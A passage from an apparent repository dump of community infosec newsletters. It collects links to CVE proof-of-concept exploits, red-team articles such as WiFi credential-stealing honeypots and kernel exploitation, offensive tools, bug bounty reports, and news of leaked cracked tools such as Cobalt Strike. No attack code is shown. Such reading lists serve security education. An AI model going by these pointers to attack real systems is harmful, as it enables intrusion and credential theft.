volumes](https://www.wiz.io/blog/attachme-oracle-cloud-vulnerability-allows-unauthorized-cross-tenant-volume-access)\n - [Attacking Firecracker : AWS' microVM Monitor Written in Rust](https://www.graplsecurity.com/post/attacking-firecracker)\n - [Threat Detection, Investigation, and Response in the Cloud](https://services.google.com/fh/files/misc/gcat_threat_detection_cloud_a.pdf)\n \n- **3 - Blue/Red/Purple/Threat Intelligence Team**\n - **Blue Team**\n - [Phishing attacks targeting GitHub accounts](https://blog.barracuda.com/2022/09/27/cybersecurity-threat-advisory-phishing-attacks-targeting-github-accounts/) -> Reccently GitHub alerted that there is an ongoing phishing campaign that is targeting its users by impersonating CircleCI continuous integration and delivery platform. \n - What Is [Data Exfiltration? MITRE ATT&CK® Exfiltration Tactic | TA0010](https://socprime.com/blog/what-is-data-exfiltration-mitre-attack/)\n - Practical Guidance for [IT Admins to respond after Ransomware attacks](https://m365internals.com/2022/09/19/practical-guidance-for-it-admins-to-respond-to-ransomware-attacks/)\n - [Data-Centric Security: Threat Hunting based on Zipf’s Law](https://ditrizna.medium.com/data-centric-security-threat-hunting-based-on-zipfs-law-50ad919fc135)\n - [Fake mobile banking rewards apps lure users to install info-stealing RAT on Android devices](https://www.microsoft.com/security/blog/2022/09/21/rewards-plus-fake-mobile-banking-rewards-apps-lure-users-to-install-info-stealing-rat-on-android-devices/)\n \n - **Red Team**\n - Tell Me Where You Live and I Will Tell You About Your P@ssw0rd: [Understanding the Macrosocial Factors Influencing Password’s Strength](https://www.gosecure.net/blog/2022/09/26/tell-me-where-you-live-and-i-will-tell-you-about-your-password-understanding-the-macrosocial-factors-influencing-passwords-strength/)\n - Microsoft researchers recently investigated [Malicious OAuth applications abuse cloud email services to spread spam](https://www.microsoft.com/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/) \n - [How to setup honeypot to Steal WiFi Login for Enterprise Networks](https://tbhaxor.com/steal-credentials-for-enterprise-wifi-networks/)\n - [Microsoft Shift F10 bypass + Autopilot privilege escalation](https://k4m1ll0.com/ShiftF10Bypass-and-privesc.html)\n - [Windows Kernel Exploitation instruction](https://hackmd.io/@truebad0ur/WindowsKernelExploiting) and [Assembled HEVD driver and loader](https://drive.google.com/file/d/19NmwL88KmiOAcRlodNCB-m9oNxC31But/view?usp=sharing)\n \n
\n\n---\n\n## Beginners-Friendly \n\n
\n\n📰📰📰 NEWS : Twiter, data breach, top 5 infosec news, event recap & hiring/jobs 📰📰📰 \n\n
\n 1. Twiter Threads & Tips\n \n \n - 🟢 The London police [Update on suspected Uber breach and Rockstar Games breach](https://twitter.com/CityPolice/status/1573281533665972225)\n - 🟢 [Hacker steals $950,000 in #Ether from a #crypto wallet via the same vanity address exploit linked to an attack on trading firm @wintermute_t\n ](https://twitter.com/WalletRank/status/1574425081916411904)\n - 🟢 [Electronics Cheat Sheet](https://twitter.com/ALSALHAN/status/1571175176120705029/photo/1)\n - 🟢 [LockBit ransomware group pays its first ever $50k bug bounty](https://twitter.com/ido_cohen2/status/1571039567666638848)\n \n
\n \n
\n\n2. Data breach & Blackhat hackers Leaked\n \n \n - 🔴 **News - Paid Tools** that has been leaked or cracked by Black Hat Hackers : \n - Cobaltstrike 4.7.1 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, acunetix_14.9.220913107, BurpSuite_pro_v2022_9.1,Acunetix Version 14 build 14.9.220713150 for Windows, Nessus Core + tenableSC 20220307 ISO & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, WinLicense 3.1.2.0 (x32/x64) Licensed, bruteratel 1.2.2, and 010 Editor 13.0-beta2.\n \n - 🔴 **News - Black Hat Hacker leaked** : \n - VX_Underground group Update on suspected Uber breach and Rockstar Games breach: A 17yrs old teen is responsible for the Rockstar & Uber breach has angered a group of ransomware Threat Actors. They state he initiated conversations on selling access, but in the midst of negotiations burned access. He claimed to have access to Kone, Bank of Brasil, Take2Games & DoorDash.\n - GTA 6 has been leaked over onion browser, American Airlines Admits databreach.\n - Conti source code for v3.7.7 and Taurus bot source code has been leaked. \n - Yanluowang ransomware group published hacked information from Cisco.\n \n
\n \n
\n\n3. Top 5 infosec news\n \n\n - 🟢 **Announcement** : \n - [Active Directory integration features in Ubuntu 22.04](https://ubuntu.com/engage/New-Active-Directory-integration-features) \n - Synack is now offering Synack90, a 90-day pentest to Business.\n - 🟢 TikTok, According to confirmed news sources, UK’s Information Commissioner said that they're read to file Chinese firm with a penalty of £27 million, as it failed to protect data privacy of children aged 13 and below.\n - 🟢 [Europol and Bitdefender Release Free Decryptor for LockerGoga Ransomware](https://www.nomoreransom.org/uploads/LockerGoga-Decrypt-Doc.pdf)\n\n
\n \n
\n\n4. Event recap\n\n \n> This Week Bside Ahmdabad 2022 Conferences, Texas Cyber Summit 2022 and Yahoo’s 1337UP0822 live hacking event was mainly trending on twitter and We have collected public available important Talk, Slides, Tools, Podcast, Videos, upcomming events related to conferences, talks & webinars so you don't miss it and watch them, at a time that suits you.\n\n - **Conferences**\n - David Worthington wrote an article on [2022 Fal.Con Event Recap](https://jumpcloud.com/blog/2022-fal-con-event-recap)\n - Joey Jablonski Thoughts from the [2022 Texas Cyber Summit](https://blog.pythian.com/thoughts-from-the-2022-texas-cyber-summit/)\n\n - **Webinars and videos**\n - Recap for [Yahoo’s 1337UP0822 live hacking event](https://blog.intigriti.com/2022/09/21/yahoo-1337up0822-live-hacking-event-round-up/) rallies researchers from around the world.\n - Tzah Pahima talk at Nullcon [Breaking Formation: From an Error Message to Internal AWS Infra](https://www.youtube.com/watch?v=TFQYBudCUf8)\n - In this video series, Mr. Jakoby, teach [PowerShell for hackers](https://www.youtube.com/playlist?list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub). A total of 21 videos have been uploaded,\n\n - **Ongoing/Upcomming 𝙀𝙑𝙀𝙉𝙏𝙎**: \n \n - InfoSec World 2022 : 26th-28th September | Orlando \n - 9th Annual Control Systems Cybersecurity : 29th September | UK\n - BruCON : 29th to 30th September | Mechelen, BE \n - NetDiligence Cyber Risk Summit : 10th-12th October | Santa Monica\n - Cyber Security World : 12th to 13th October | Singapore, SG \n - CISO visions : 17th to 21st October | Virtual – English \n - Mandiant mWISE Cybersecurity Conference 2022 : 18th-20th October | Washington DC \n - E-crime & Cybersecurity London : 19th October | London, UK \n - 7th Annual Counter Insider Threat Symposium : 19th October | Maryland \n - IT-SA : 25th to 27th October | Nuremberg, DE \n\n
\n \n
\n\n5. Hiring/Jobs\n\n \n> In this Beginners friendly segment, we talk about and share latest resources related to Jobs in this month, interview questions and free trainning offered by organization, community and leader.\n \n - 1. Take a Look at [Internship/Job Opening in September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n - 2. Here ResetHacker have collected [Interview Questions asked by organization](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n
\n
\n\n\n
\n 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞 \n\n
\n 1. Hackerone/Bugcrowd reports for Bug Hunters. \n \n *1. In This Segment, We have filtered out Top **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n - 🐞$13,950 - [XSS in ZenTao integration affecting self hosted instances without strict CSP](https://hackerone.com/reports/1542510)\n - 🐞$10.000 - [size_t-to-int vulnerability in Sony exFAT leads to memory corruption via malformed USB flash drives](https://hackerone.com/reports/1340942)\n - 🐞$8,690 - [Content injection in Jira issue title enabling sending arbitrary POST request as victim](https://hackerone.com/reports/1533976)\n - 🐞$5,000 - [XSS Reflected on reddit.com via url path](https://hackerone.com/reports/1051373)\n
\n \n
\n2. BUG BOUNTY : writeups, tips & resources. \n \n *2. In This Beginners friendly segment, We collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES*** \n \n - [Viewing Instagram live streams anonymously without notifying the host](https://feed.bugs.xdavidhu.me/bugs/0015)\n - A quick [bash function to read nmap scans in the terminal](https://h4knet.medium.com/pretty-print-nmap-grepable-gnmap-files-56ffd6ca9e20)\n - @HasharMujahid wrote a writeup explaining [Multi-Factor Authentication Vulnerabilities](https://infosecwriteups.com/multi-factor-authentication-vulnerabilities-7a4b647a7b09)\n - An detailed article on [SSRF vulnerabilities and where to find them](https://labs.detectify.com/2022/09/23/ssrf-vulns-and-where-to-find-them/)\n - Secpy Community explained the SANS Top 25 [Software Errors (Part 1 of 25): CWE-787 Out-of-bounds Write](https://infosecwriteups.com/sans-top-25-software-errors-part-1-of-25-cwe-787-out-of-bounds-write-4e1a7c63ff38)\n - The deep links crash course, [Part 1: Introduction to deep links](https://medium.com/androiddevelopers/the-deep-links-crash-course-part-1-introduction-to-deep-links-2189e509e269) & [Part 2: Deep links from Zero to Hero](https://medium.com/androiddevelopers/the-deep-links-crash-course-part2-deep-links-from-zero-to-hero-37f94cc8fb88)\n \n
\n
\n\n
\n 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ \n\n> Community members test the tools and we filter out most demanding and every week We filter out helpful tools that satisfy the hacker Purpose in different domains.\n\n
\n1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 5 Tools\n \n - **1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 5\n \n - [Cpplumber 0.1.0 - Static analysis tool based on clang, which detects source-to-binary information leaks in C and C++ projects.](https://github.com/ergrelet/cpplumber)\n - [UseReFuzz](https://github.com/root-tanishq/userefuzz) -> SQLI Tester for HTTP Headers, by [Kun](https://twitter.com/root_tanishq)\n - [Mizusawa](https://github.com/0x727/ShuiZe_0x727) -> Information Gathering Automation Tool.\n - [WARF](https://github.com/iamnihal/warf) -> A Web Application Reconnaissance Framework that helps to gather information about the target.\n - [dnsReaper](https://github.com/punk-security/dnsReaper) -> subdomain takeover tool for attackers, bug bounty hunters and the blue team!\n
\n\n
\n2. Cloud Security - 3 Tools \n \n - **2. Cloud Security** - 3\n - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting Assets from Cloud Providers. This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts.\n
\n\n
\n3. Blue/Red/Purple Team, IR and Threat intelligence - 5 Tools \n \n - **3. Blue/Red/Purple Team, IR and Threat intelligence Tools** - 5\n - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) -> varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n - [Codecepticon](https://github.com/Accenture/Codecepticon) -> An offensive security obfuscator for C#, VBA, and PowerShell.\n - [LDAP Nom Nom - anonymously bruteforce Active Directory usernames at high speed](https://github.com/lkarlslund/ldapnomnom),which allows you to anonymously bruteforce Domain Controllers to find usernames in Active Directory at high speeds.\n - [exploits-predict](https://github.com/wisoffe/exploits-predict) -> Predicting the probability of an exploit being released after a CVE is published (by Machine learning algorithm) and this project is based on [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n - [Elixir Secure Coding Training (ESCT)](https://github.com/Podium/elixir-secure-coding) - An interactive cybersecurity curriculum designed for enterprise use.\n
\n\n
\n4. Reverse Engineering & OSINT - 3 Tools \n \n - **4. Reverse Engineering & OSINT Tools** - 3\n - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. Its objective is to deliver fast and flexible “first view” for malware analysts, stable and capable to handle malformed PE files.\n - [uosint](https://github.com/uosint-project/uosint) -> Find The Profiles Of A Person On Social Networks. \n - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) -> A batch script that allows you to search a phrase or keywords with 12 different search engines. You can do so one at a time or all at once. \n\n
\n\n
\n5. IoT, OS & Hardware - 3 \n \n - **5. IoT, OS & Hardware** - 3\n \n - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n - [Cotopaxi](https://github.com/Samsung/cotopaxi) - Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) -> Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\n
\n
\n\n---\n \n
\n 🤝🤝🤝 Contact-Us, Team/Contributor and Community Engagement patners and Resources. 🤝🤝🤝 \n

\n \n
\n\n> Huge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n \n - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n> I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support distributing \"Weekly InfoSec Update\" among hackers would not have been possible.\n\n> Resources from [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us drafting [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md).\n\n
\n \n#### Wrapping Up\n\n Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.\n \n If you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ??\n Thanks for reading!\n" }, { "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_09.md", "content": "#### Hey Hackers, I hope you’ve been doing well on the weekend! and quote of Week is \"Don't rush the Process. Good Things Take Time.\"\n > Here are the agenda for *Weekly infosec Update v0.7* : **28th September - 11th October 2022**\n \n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) \n\n**Tips to SAVE TIME & How to READ this Newsletter? 👇**\n- Select the topic from the **Navbar** bellow and click on **Summary/Preview** and **Arrow (>)** to see the Details:\n\n- Open all relevant Title in New Tab (Ctrl+Click) then READ it one by one.\n\n[![cve poc](https://img.shields.io/badge/-CVE-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![research & Business](https://img.shields.io/badge/-Research-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![beginners](https://img.shields.io/badge/-News-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-beginners) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![tools](https://img.shields.io/badge/-Tools-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-tools) \n\n![WIU_Trail_Pro](https://user-images.githubusercontent.com/25515871/191970244-14b8821b-acd9-4fb6-8e9b-f627392c4715.png)\n \n---\n\n\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n#### Week -> [**27th September - 11th October 2022**👈](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n\n \nSecurity patched within a week: \n \n > We have tracked the latest Security advisory of top vendors and filter out high and critical vulnerability that has been patched.\n > In this week, we have update from microsoft (40+), Github (sqlite3 & tensorflow), cisco, Ubuntu 22.04, 20.04 LTS, 18.4 and firefox.\n\n\n\nCVE analysis, writeups and reports: (a total of 7 in last 2 week)\n \n > This week, we have collected the recently discovered write-ups for cve that have critical or higher severity. \n\n\n \n Poc for cve & exploit (a total of 18+ in last 2 week) :\n \n > Every week, we're tracking the recetly discovered exploit and poc for cve. \n\n\n
\nSummary/Preview\n \n'''\n \n CVE:ANALYSIS & POC: Cve-2022-34960, cve-2022-41218, HackerOne report #1672388- Gitlab, cve-2022–33987, \n Cve-2022–36635 and Detailed Report of Top cves most used by Chinese state-sponsored cyber actors since 2020 \n\n \n CVE POC (0-Day): Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit, \n Cve Collection of jQuery UI XSS Payloads, nuclei-templete for cve-2022–35405, An updated list of PoC's cve's, \n \n PS5-4.03-Kernel-Exploit, cve-2022-41040, cve-2022-26726, cve-2022-30600, cve-2022-39197, cve-2021-29156 Exploit, \n Cve-2022-30206, cve-2022-2992, cve-2022-41208, cve-2022-2274 and cve-2022-36804\n \n'''\n
\n\n--- \n\n\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n > In this segment, We have collected relevant and latest article/whitepaper/research/technique/resources this week from all the infosec domains for independent researcher and professionals those who want to stay upto date with latest security, looking for a new approach to find CVE/bug, want to track the Infosec market and startups. \n
\n1 - Infosec Business, funded and Market \n \n - **1 - Infosec Business, funded and Market** \n \n - [The Latest Funding News and What it Means for Cyber Security in 2023](https://thehackernews.com/2022/10/the-latest-funding-news-and-what-it.html)\n - [Cloudflare’s v2.0 Startup Plan to Build your next startup on Cloudflare](https://blog.cloudflare.com/startup-program-v2/)\n > Cloudflare has announced a new funding program with 26 VC firms where $1.25 billion will be provided if startups are building applications on Cloudflare Workers.\n - [On the Art of Selling to Cybersecurity People](https://www.returnonsecurity.com/the-art-of-selling-to-cybersecurity-people/)\n > This article mainly explain How to Build a Relationship, Skip Show n'Tell, Canned Scripts Get Canned & Integration Matters.\n - [Why Is ISO 27001 Important For Small Businesses?](https://secureblitz.com/why-is-iso-27001-important-for-small-businesses/)\n - [Why do security products fail?](https://my.rage.cloud/why-do-security-products-fail-7477dd0ec878) \n \n - **Infosec Market Helpdesk**\n > This research share the insight of [Indian Market, client and help you understand who is right client for your business](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing) \n \n > [5G Cybersecurity Market to See Incredible Growth By 2022-2028](https://www.openpr.com/news/2753049/5g-cybersecurity-market-to-see-incredible-growth-by-2022-2028)\n \n > Investers and Venture capital(VC) for cybersecurity STARTUP : [Liberty City Ventures](https://www.libertycityventures.com/), [Evolution Equity](https://evolutionequity.com/), [M12VC](https://m12.vc/), [Team8.VC](https://team8.vc/), [Centerstone Capital](https://www.centerstone.capital/), [Insight partners](https://www.insightpartners.com/), [World Trade Venture](http://worldtradeventures.com/), [Menara Venture](https://menaraventures.com/) etc.\n \n
\n \n
\n 2. Research/Article discussed by professionals or independent researchers \n \n - **1 - Web Security and android security**\n - SANS released a survey [Think Like a Hacker: Inside the Minds and Methods of Modern Adversaries | September 2022](https://drive.google.com/file/d/1LiandSv7-TNGpzY5IsUzPNDReDVTiJgl/view?usp=sharing)\n - Wallarm released a detailed report on [API vulnerabilities Discovered and Exploited in Q1-2022](https://drive.google.com/file/d/1MuOdfTDC6VRbNKnvHS1jYeOHfoEOi_Ci/view?usp=sharing)\n - [How to secure against forced browsing info disclosures](https://rez0.blog/cybersecurity/2022/09/22/prevent-info-disclosures.html)\n - [Flutter review and its reverse engineering](https://swarm.ptsecurity.com/fork-bomb-for-flutter/)\n - [How to avoid data breaches with GraphQL?](https://blog.escape.tech/data-leaks/), by Sophie Boulaaouli \n \n - **2 - Cloud Security & Automation**\n - [A Guide to Improving Security Through Infrastructure-as-Code](https://research.nccgroup.com/2022/09/19/a-guide-to-improving-security-through-infrastructure-as-code/)\n - [Using policy-as-code within infrastructure-as-code](https://doordash.engineering/2022/09/20/how-doordash-ensures-velocity-and-reliability-through-policy-automation/) : How DoorDash Ensures Velocity and Reliability through Policy Automation.\n - [Attacking Firecracker : AWS' microVM Monitor Written in Rust](https://www.graplsecurity.com/post/attacking-firecracker)\n - [Threat Detection, Investigation, and Response in the Cloud](https://services.google.com/fh/files/misc/gcat_threat_detection_cloud_a.pdf)\n \n- **3 - Blue/Red/Purple/Threat Intelligence Team**\n - **Blue Team**\n - [Securely Implementing IdP-initiated SAML2 Login](https://goteleport.com/blog/idp-initiated/)\n - [Trace Oddity: Methodologies for Data-Driven Traffic Analysis on Tor](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n > The paper presents a new end-to-end (e2e) correlation attack on Tor users, which helps to analyze network traffic more effectively to deanonymize them. To implement the attack, [Tensorflow version 2.2.0](https://pypi.org/project/tensorflow/2.2.0/)\nand [Keras version 2.3.0-tf](https://github.com/keras-team/keras/releases/tag/2.3.0) were used to implement their own deep learning model, as well as rewritten for the needs of [DeepCorr 6](https://github.com/woodywff/deepcorr), which was previously used to implement correlation attacks on Tor. \n \n - [Building a Holistic Insider Risk Management Program](https://drive.google.com/file/d/1jAlNYwuPdZ-UWlawyTDCqGvRduHFZdDN/view?usp=sharing)\n > This article explain Why companies should think about insider risk as part of their data protection strategy with a holistic approach that includes the right people, processes, and training, in addition to the appropriate tools.\n \n - [What can we learn from leaked Insyde's BIOS for Intel Alder Lake](https://hardenedvault.net/blog/2022-10-08-alderlake_fw-leak/)\n - [Layer 2 network security bypass using VLAN 0, LLC/SNAP headers and invalid length](https://blog.champtar.fr/VLAN0_LLC_SNAP/) \n > It gives you multiple ways to encapsulate the same L3 payload on Ethernet/Wifi, allowing to bypass some L2 network security control implementations like IPv6 Router Advertisement Guard.\n - [Phishing attacks targeting GitHub accounts](https://blog.barracuda.com/2022/09/27/cybersecurity-threat-advisory-phishing-attacks-targeting-github-accounts/) \n - Practical Guidance for [IT Admins to respond after Ransomware attacks](https://m365internals.com/2022/09/19/practical-guidance-for-it-admins-to-respond-to-ransomware-attacks/)\n\n - **Red Team**\n - [Hidden DNS resolvers and how to compromise a fully-patched WordPress instance](https://sec-consult.com/blog/detail/melting-the-dns-iceberg-taking-over-your-infrastructure-kaminsky-style/)\n - [Comparing Semgrep and CodeQL](https://blog.doyensec.com/2022/10/06/semgrep-codeql.html)\n - How To [Attack Admin Panels Successfully](https://infosecwriteups.com/how-to-attack-admin-panels-successfully-72c90eeb818c) by c0d3x27\n - Tell Me Where You Live and I Will Tell You About Your P@ssw0rd: [Understanding the Macrosocial Factors Influencing Password’s Strength](https://www.gosecure.net/blog/2022/09/26/tell-me-where-you-live-and-i-will-tell-you-about-your-password-understanding-the-macrosocial-factors-influencing-passwords-strength/)\n \n
\n\n---\n\n### Friendly Segment\n > We have tried to solve the problem \"How to stay upto date with latest Bug Bounty Community without wasting time on social media\" and this segment is friend for Intermidiate bug hunters and ethical hacker where NEWS and TOOLS segment are common for professional and intermidiate.\n
\n \n📰📰📰 Hacker NEWS 📰📰📰 \n \n > Based on hacker requirenment, we have reseted infosec news into 5 differrent segment👇\n \n\n
\n 1. Top 7 infosec news \n \n - Aquesgition in last Few weeks .\n > [Vanta](vanta.com), a security compliance automation startup, today announced that it raised $40 million in an extension of its Series B funding round.\n \n > After Google cloud aquire Mandiant(unique threat intelligence) and now Linking up Google Cloud’s security business with Mandiant.\n \n - Prime Minister of india officially inogratated the 5G spectrum in the event \"India Mobile Congress 2022\" \n > where multiple workshop has been organize to demonstrate the opportunity with the help of 5G technology in virtual reality(VR), augmented reality(AR), metaverse, ai/ml, automation, drone, cybersecurity, inhance the real time support/education etc. Jio, airtel and vi have enrolled 5G technology in 8 major city of india.\n - Open Network for Digital Commerce [ONDC](https://ondc.org/) went live with its beta test in 16 pincode in Bengaluru(India) \n > A technology similar to UPI that promises to democratise access to the internet for small enterprises. \n - [ULIP portal](https://goulip.in/) has been launched in india which will help to reduce logistics cost by making logistic degital in India.\n - Recently, the Centre has asked mobile phone manufacturers to ensure all phones in India NaVIC-compatible.\n > US denied GPS access to India during Kargil war in 1999. Then, India decided to develop its own GPS and ISRO developed NavIC and operational since 2018.\n - An article from ecnomictimes says that India offers operational, cyber security training to Philippines military.\n \n
\n \n
\n 2. Event recap \n \n > This Week Bsides Ahmadabad Conferences 2022, Recon by Nahamsec and Nullcon Goa conference 2022 videos was mainly trending among community and we have collected public available important Talk, Slides, Tools, Podcast, Videos, upcomming events related to conferences, talks & webinars so you don't miss it and watch them, at a time that suits you.\n\n - **Conferences**\n \n - BSides Ahmedabad Conferences 2022\n > Event started with Keynote speakers @YassineAboukir & @The Cyber Mentor then continues with speakers such as Daher Hussein, Nikhil Srivastava, Eugene \"Spaceraccoon\" Lim, Harsh Bothra, @Farah Hawa, Bhavuk Jain etc. and we'll collected public available slide from the talk in case you have missed the event.\n - [Hussein Daher Slides Bsides Ahemdabad Talk : Bug Bounty On Steroids](https://pr0xy.cc/bsides.pdf)\n - [The Dark side of Defi](https://docs.google.com/presentation/d/1i1Ski5EcxPczvjdlYAwwditmQFdLAeGEVC59h4Gkx20/edit#slide=id.g149676658b2_0_1169)\n - [PHP EAR to SQLi](https://docs.google.com/presentation/d/1brq-isjC_2iVINZTvW2-vSO2dNi47Lj9B2SWHLljtAc/edit#slide=id.g1f87997393_0_782)\n - [The tale of chaining bug for account takeover](https://speakerdeck.com/harshbothra/tale-of-chaining-bugs-for-account-takeover) by Harsh Bhotra\n - [Pawning android apps at scale](https://www.canva.com/design/DAFN6i0Z7b4/TW_hNUIkBAdnJc3zmyIRSA/view?utm_content=DAFN6i0Z7b4&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton)\n - [How to write your First Nuclei Template?](https://github.com/DhiyaneshGeek/My-Presentation-Slides/blob/main/slides/How-to-write-your-First-Nuclei-Template.pdf)\n \n - [Nullcon Goa Conferences 2022 talk playlist](https://www.youtube.com/watch?v=Ut3yGqqg9W8&list=PLWv48qIcomCZVhwxDnEUmxJ8bfkTQsRPa) \n > Where you'll find talk and panel discussion such as CXO Panel discussion on Secure Service Edge (SSE): Challenges & Upsides of Adoption, Tzah Pahima talks on Breaking Formation: From an Error Message to Internal AWS Infra, Alexander Popov finding and view point as Kernel Hacker on Fuchsia OS and Anto Joseph talk on different bridge designs, their security trade-offs, vulnerabilities that may exist in these designs, and best practices for end-users and developers etc.\n \n - Serialised narration of the Tech Talks that happened over Nullcon Goa 2022. [Part 1](https://appsecco.com/blog/nullcon-2022-tech-talks-1) and [Part 2](https://appsecco.com/blog/nullcon-2022-tech-talks-compilation-2)\n \n - [9th Annual Control Systems Cybersecurity Recap : 29th September | UK](https://www.wwt.com/article/infosecurity-europe-2022-recap)\n - and other events in cybersecurity were BruCON 2022 : 29th to 30th September | Mechelen, BE. \n \n - **Webinars and videos**\n - Podcast [Two CISOs discuss the conviction of ex-Uber CISO](https://open.spotify.com/episode/4NqI0eXvLFlb5Dnxc0PdU7) \n > Andrew Monaghan had Ben Halpert, the CISO of Groupon, and myself on the Sales Bluebird podcast to talk about what the sentencing could mean for the cybersecurity industry\n - APISSEC University is hosting a live discussion with API security experts from U.S. Bank and WeWork on October 20th at 12pm ET for a discussion on [The 3 Pillars of API Security: Governance, Testing and Monitoring. you can register here.](https://my.demio.com/ref/8SgjSd5ekemBWh5d)\n - Recon by Nahamsec where co-host was Farah Hawa : [Rhynorater Talks About Grafana SSRF, Picking Bug Bounty Targets, and His Favorite Hacking Tools!](https://www.youtube.com/watch?v=hdp-WDZ9dgw)\n - In this video series, Mr. Jakoby, teach [PowerShell for hackers](https://www.youtube.com/playlist?list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub). A total of 21 videos have been uploaded.\n - [Making $$$ with Clickjacking](https://m.youtube.com/watch?v=kzI6sd02lXc)\n - In case you have missed the Bside Ahmedabad then [Veeman has shared a inside blog for event](https://www.youtube.com/watch?v=LzuCyA8MaKo)\n\n\n - **Ongoing/Upcomming 𝙀𝙑𝙀𝙉𝙏𝙎**: \n \n - NetDiligence Cyber Risk Summit : 10th-12th October | Santa Monica\n - Cyber Security World : 12th to 13th October | Singapore, SG \n - CISO visions : 17th to 21st October | Virtual – English \n - Mandiant mWISE Cybersecurity Conference 2022 : 18th-20th October | Washington DC \n - E-crime & Cybersecurity London : 19th October | London, UK \n - 7th Annual Counter Insider Threat Symposium : 19th October | Maryland \n - IT-SA : 25th to 27th October | Nuremberg, DE \n\n
\n \n
\n 3. Twitter Threads, News, Anouncement & Tips 🟢\n \n \n - Announcement :\n - 🟢 Intigriti resume the [BugBytes newsletter new issue #176 with a new creator @InsiderPHD](https://blog.intigriti.com/2022/10/05/bug-bytes-176/)\n - 🟢 Snyk launches a free [code checker](https://snyk.io/code-checker/)\n > This free code checker can find critical vulnerabilities and security issues with a click and you can intigrate with you're IDE as well.\n - 🟢 HackTheBox [announcing a new certification](https://twitter.com/hackthebox_eu/status/1574422266209005569): HTB Certified Penetration Testing Specialist (HTB CPTS) \n > You have to \"Buy a voucher\" and each exam voucher includes two (2) exam attempt within a year. \n - 🟢 SANS [Difference Makers Awards 2022](https://survey.sans.org/jfe/form/SV_bKHZV4Dw9Vje3ye) to supporting the humans at work behind the technology.\n > This year, SANS are partnering with Axonius and Chris Cochran and Ron Eddings from Hacker Valley Media, as they share our passion for supporting the unsung heroes of cybersecurity and the humans at work behind the technology.\n - 🟢 Synack is now offering Synack90, a 90-day pentest to Business.\n \n - Threads, Resources, News & Tips:\n - 🟢 InsidePHP favourite source on twtter [@CVENew to keep up to date on recent CVEs](https://twitter.com/CVEnew)\n - 🟢 Shawn Thomas, Director of Forensics and IR at Yahoo!, created a [thread about preparing a resume](https://twitter.com/understudy77/status/1572397580675600384)\n - 🟢 Kevin Beaumont confirm significant numbers of [new zero day exists in Microsoft Exchange servers have been backdoored - including a 